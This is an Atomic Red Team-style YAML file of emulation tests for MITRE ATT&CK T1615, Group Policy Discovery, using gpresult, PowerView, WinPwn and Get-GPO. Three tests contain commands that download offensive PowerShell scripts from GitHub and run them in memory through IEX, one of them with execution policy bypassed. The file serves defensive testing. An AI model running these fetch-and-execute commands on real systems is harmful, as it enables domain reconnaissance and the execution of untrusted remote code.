attack_technique: T1615
display_name: 'Group Policy Discovery'
atomic_tests:
- name: Display group policy information via gpresult
  auto_generated_guid: 0976990f-53b1-4d3f-a185-6df5be429d3b
  description: |
    Uses the built-in Windows utility gpresult to display the Resultant Set of Policy (RSoP) information for a remote user and computer
    The /z parameter displays all available information about Group Policy. More parameters can be found in the linked Microsoft documentation
    https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/gpresult
    https://unit42.paloaltonetworks.com/emissary-trojan-changelog-did-operation-lotus-blossom-cause-it-to-evolve/
    Turla has used the /z and /v parameters: https://www.welivesecurity.com/wp-content/uploads/2020/05/ESET_Turla_ComRAT.pdf
  supported_platforms:
  - windows
  executor:
    name: command_prompt
    elevation_required: false
    command: |
      gpresult /z

- name: Get-DomainGPO to display group policy information via PowerView
  auto_generated_guid: 4e524c4e-0e02-49aa-8df5-93f3f7959b9f
  description: Use PowerView to Get-DomainGPO This will only work on Windows 10 Enterprise and A DC Windows 2019.
  supported_platforms:
  - windows
  executor:
    command: powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://github.com/BC-SECURITY/Empire/blob/86921fbbf4945441e2f9d9e7712c5a6e96eed0f3/empire/server/data/module_source/situational_awareness/network/powerview.ps1'); Get-DomainGPO"
    name: powershell
    elevation_required: true
- name: WinPwn - GPOAudit
  auto_generated_guid: bc25c04b-841e-4965-855f-d1f645d7ab73
  description: Check domain Group policies for common misconfigurations using Grouper2 via GPOAudit function of WinPwn
  supported_platforms:
  - windows
  executor:
    command: |-
      iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
      GPOAudit -noninteractive -consoleoutput
    name: powershell
- name: WinPwn - GPORemoteAccessPolicy
  auto_generated_guid: 7230d01a-0a72-4bd5-9d7f-c6d472bc6a59
  description: Enumerate remote access policies through group policy using GPORemoteAccessPolicy function of WinPwn
  supported_platforms:
  - windows
  executor:
    command: |-
      iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
      GPORemoteAccessPolicy -consoleoutput -noninteractive
    name: powershell
- name: MSFT Get-GPO Cmdlet
  auto_generated_guid: 52778a8f-a10b-41a4-9eae-52ddb74072bf
  description: 'The Get-GPO cmdlet gets one Group Policy Object (GPO) or all the GPOs in a domain. Tested on Windows Server 2019 as a domain user with computer joined to domain. Reference: https://docs.microsoft.com/en-us/powershell/module/grouppolicy/get-gpo?view=windowsserver2022-ps'
  supported_platforms:
  - windows
  input_arguments:
    gpo_output:
      description: The output of the Get-GPO cmdlet
      type: string
      default: $env:temp\GPO_Output.txt
    gpo_param:
      description: You can specify a GPO by its display name or by its globally unique identifier (GUID) to get a single GPO, or you can get all the GPOs in the domain through the All parameter
      type: string
      default: -All
  dependency_executor_name: powershell
  dependencies:
  - description: Add Rsat.ActiveDirectory.DS
    prereq_command: if(Get-WindowsCapability -Online -Name Rsat.ActiveDirectory.DS-LDS.Tools~~~~0.0.1.0 | Where-Object { $_.State -eq 'Installed' }){ exit 0 } else { exit 1 }
    get_prereq_command: Add-WindowsCapability -online -Name Rsat.ActiveDirectory.DS-LDS.Tools~~~~0.0.1.0
  - description: 'Add Rsat.GroupPolicy.Management.Tools ###Two RSAT Modules needed for this to work on Win10, WinServer 2019 works by default. This will take a long time (almost 2 minutes) to install RSAT Manually###.'
    prereq_command: if(Get-WindowsCapability -Online -Name Rsat.GroupPolicy.Management.Tools~~~~0.0.1.0 | Where-Object { $_.State -eq 'Installed' }){ exit 0 } else { exit 1 }
    get_prereq_command: Add-WindowsCapability -online -Name Rsat.GroupPolicy.Management.Tools~~~~0.0.1.0
  executor:
    command: 'Get-GPO -Domain $ENV:userdnsdomain #{gpo_param} >> #{gpo_output}'
    cleanup_command: del $env:temp\GPO_Output.txt -erroraction silentlycontinue
    name: powershell
    elevation_required: true